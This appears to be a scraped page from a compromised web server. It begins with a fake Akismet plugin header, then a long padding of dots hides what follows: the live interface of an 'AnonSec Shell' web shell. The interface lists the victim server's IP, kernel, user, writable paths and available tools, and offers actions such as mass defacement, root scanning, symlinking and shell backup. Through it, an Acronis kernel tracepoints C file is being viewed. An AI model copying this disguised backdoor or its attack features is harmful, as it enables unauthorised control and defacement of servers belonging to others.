#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 62.109.13.187  /  Your IP : 216.73.216.11   [ Reverse IP ]
Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28
System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : mosrembit ( 6064)
PHP Version : 8.2.28
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/src/file_protector-1.1-234/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /usr/src/file_protector-1.1-234/tracepoints.c
/**
@file
@brief    'exec', 'exit' and 'fork' tracepoints
@details  Copyright (c) 2017-2021 Acronis International GmbH
@author   Mikhail Krivtsov (mikhail.krivtsov@acronis.com)
@since    $Id: $
*/

#include "tracepoints.h"

#include "compat.h"
#include "debug.h"
#include "exit_event.h"
#include "fork_event.h"
#include "memory.h"
#include "message.h"

#include <linux/binfmts.h>
#include <linux/dcache.h>	// d_path
#include <linux/file.h>		// fput()
#include <linux/fs.h>		// struct file
#include <linux/limits.h>	// PATH_MAX
#include <linux/mm.h>		// get_task_exe_file()
#include <linux/mm_types.h>	// struct mm_struct
#include <linux/path.h>		// struct path
#include <linux/sched.h>	// struct task_struct
#include <linux/tracepoint.h>
#include <linux/version.h>	// LINUX_VERSION_CODE, KERNEL_VERSION()
#include <trace/events/sched.h>	// TRACE_EVENT(sched_*)

static TRACE_CB_PROTO(sched_process_exit,
		TP_PROTO(struct task_struct *p))
{
	DPRINTF("exit() p=%p { pid=%d tgid=%d }", p, p->pid, p->tgid);
	exit_event_nowait(p->tgid, p->pid);
}

// FIXME: 'fork' tracepoint merges new processes into single meta process
// which can be 'white-listed'. Without 'exec' tracepoint 'grey' processes
// produced on 'exec' event can stay in 'white' list. It breaks heuristics
// operation and prevents malware detection.
#if KERNEL_VERSION(3, 4, 0) <= LINUX_VERSION_CODE
/*
 * Here the caller only guarantees locking for struct file and struct inode.
 * Locking must therefore be done in the probe to use the dentry.
 */
static TRACE_CB_PROTO(sched_process_fork,
		TP_PROTO(struct task_struct *current_macro,
				struct task_struct *p))
{
	DPRINTF("fork() current=%p { pid=%d tgid=%d comm='%s' } "
		"p=%p { pid=%d tgid=%d comm='%s' }",
		current_macro, current_macro->pid, current_macro->tgid,
				current_macro->comm,
		p, p->pid, p->tgid, p->comm);
	fork_event_nowait(current_macro->tgid, current_macro->pid, p->tgid, p->pid);
}
#endif

int tracepoints_attach(void)
{
	int ret;

	ret = REGISTER_TRACE(sched_process_exit, TRACE_CB_NAME(sched_process_exit));
	if (ret) {
		EPRINTF("'register_trace_sched_process_exit()' failure %i", ret);
		goto unregister_exec;
	}

#if KERNEL_VERSION(3, 4, 0) <= LINUX_VERSION_CODE
	ret = REGISTER_TRACE(sched_process_fork, TRACE_CB_NAME(sched_process_fork));
	if (ret) {
		EPRINTF("'register_trace_sched_process_fork()' failure %i", ret);
		goto unregister_exit;
	}
#endif

	IPRINTF("tracepoints attached");
	//ret = 0;	// Note: 'ret' is already 0 here
	goto out;

#if KERNEL_VERSION(3, 4, 0) <= LINUX_VERSION_CODE
unregister_exit:
#endif
	UNREGISTER_TRACE(sched_process_exit, TRACE_CB_NAME(sched_process_exit));
unregister_exec:
	tracepoint_synchronize_unregister();
out:
	return ret;
}

void tracepoints_detach(void)
{
#if KERNEL_VERSION(3, 4, 0) <= LINUX_VERSION_CODE
	UNREGISTER_TRACE(sched_process_fork, TRACE_CB_NAME(sched_process_fork));
#endif
	UNREGISTER_TRACE(sched_process_exit, TRACE_CB_NAME(sched_process_exit));
	tracepoint_synchronize_unregister();
	IPRINTF("tracepoints detached");
}

Anon7 - 2022
AnonSec Team